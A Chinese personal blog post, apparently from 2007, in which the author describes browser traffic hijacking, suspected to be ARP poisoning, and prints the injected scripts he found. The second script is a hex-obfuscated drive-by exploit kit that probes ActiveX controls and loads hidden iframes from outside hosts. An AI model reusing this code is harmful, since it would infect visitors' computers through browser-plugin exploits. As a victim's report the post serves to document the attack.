又被劫持

因为遇到firefox无法下载文件无法管理的问题,重新下载了2.0.0.4英文版的安装了下,结果又遭遇劫持事件。

安装以后发现打开含有google adsense的页面全部还有第三方的JS,来自于y66.us。

  1. <script src=http://y66.us/2.js></script>

打开这个JS,是一段框架代码

  1. document.writeln("<script src=\"http:\/\/y66.us\/oK\/Vernum.js\">< \/script>");
  2. document.writeln("</script><script>");
  3. document.writeln("function Start(){");
  4. document.writeln("var Then = new Date() ");
  5. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
  6. document.writeln("var cookieString = new String(document.cookie)");
  7. document.writeln("var cookieHeader = \"Cookie1=\" ");
  8. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
  9. document.writeln("if (beginPosition != -1){ ");
  10. document.writeln("} else ");
  11. document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
  12. document.writeln("document.writeln(\"<iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\">< \\\/iframe>\");");
  13. document.writeln("document.writeln(\"</iframe><iframe height=0 width=0 src=\\\"http:\\\/\\\/y66.us\\\/oK\\\/oKT.asp\\\">< \\\/iframe>\");");
  14. document.writeln("}");
  15. document.writeln("}");
  16. document.writeln("Start();");
  17. document.writeln("< \/script>")

感觉这段代码不会对我的电脑带来任何益处,询问了下,不是google adsense的问题,那就是我的浏览器出了问题。立即把firefox的所有缓存都清除,并卸载了firefox,整机杀了下毒,并没发现什么。重新下载安装中文版的,一切又恢复了正常。 😕
比较奇怪,一直比较谨慎,安装了no script,很少会自动运行不正常网站的代码,也不知道是在哪中招了。

暂时可以使用Anti ARP Sniffer预防这一问题。

2007.10.18 Update: 今天又碰到类似的劫持
js来自

  1. <script src=http://rb.vg/1.js></script>

JS代码为

  1. var vDA1 = new window["\x44\x61\x74\x65"]()
  2. vDA1["\x73\x65\x74\x54\x69\x6d\x65"](vDA1["\x67\x65\x74\x54\x69\x6d\x65"]() + 24*60*60*1000)
  3. var eOTo$2 = new window["\x53\x74\x72\x69\x6e\x67"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"])
  4. var eZT3 = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d"
  5. var VMliYvVKu4 = eOTo$2["\x69\x6e\x64\x65\x78\x4f\x66"](eZT3)
  6. if (VMliYvVKu4 == -1)
  7. {
  8. window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = "\x43\x6f\x6f\x6b\x69\x65\x31\x3d\x50\x4f\x50\x57\x49\x4e\x44\x4f\x53\x3b\x65\x78\x70\x69\x72\x65\x73\x3d"+ vDA1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]()
  9. try{if(new ActiveXObject("\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x58\x4d\x4c\x48\x54\x54\x50"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72\x69\x70\x74 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\/\/\x4e\x6f\x50\x2e\x67\x73\/\x73\x33\x36\x38\/\x4e\x65\x77\x4a\x73\x31\x2e\x6a\x73\x22\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e');}catch(e){} // ms06014
  10. try{if(new ActiveXObject("\x44\x50\x43\x6c\x69\x65\x6e\x74\x2e\x56\x6f\x64"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x74\x33\x36\x38\x6f\x6b\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // XL
  11. try{if(new ActiveXObject("\x4d\x50\x53\x2e\x53\x74\x6f\x72\x6d\x50\x6c\x61\x79\x65\x72\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x47\x6f\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // BF
  12. try{if(new ActiveXObject("\x50\x4f\x57\x45\x52\x50\x4c\x41\x59\x45\x52\x2e\x50\x6f\x77\x65\x72\x50\x6c\x61\x79\x65\x72\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x54\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // PPS
  13. try{if(new ActiveXObject("\x50\x64\x67\x32"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x72\x65\x61\x64\x65\x72\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // CX
  14. try{if(new ActiveXObject("\x47\x4c\x43\x48\x41\x54\x2e\x47\x4c\x43\x68\x61\x74\x43\x74\x72\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x4c\x69\x6e\x6b\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // LZ
  15. try{if(new ActiveXObject("\x42\x61\x69\x64\x75\x42\x61\x72\x2e\x54\x6f\x6f\x6c\x2e\x31"))window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x69\x66\x72\x61\x6d\x65 \x73\x74\x79\x6c\x65\x3d\x64\x69\x73\x70\x6c\x61\x79\x3a\x6e\x6f\x6e\x65 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x4e\x6f\x50\x2e\x67\x73\x2f\x73\x33\x36\x38\x2f\x50\x69\x63\x33\x36\x38\x2e\x67\x69\x66\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');}catch(e){} // Baidu
  16. }

疑为局域网ARP病毒。

firefox,劫持

《又被劫持》有2个想法

  1. 好象不是本地的问题,我的内网服务器有这段js, 访问别的网站都没有。

发表评论

电子邮件地址不会被公开。 必填项已用*标注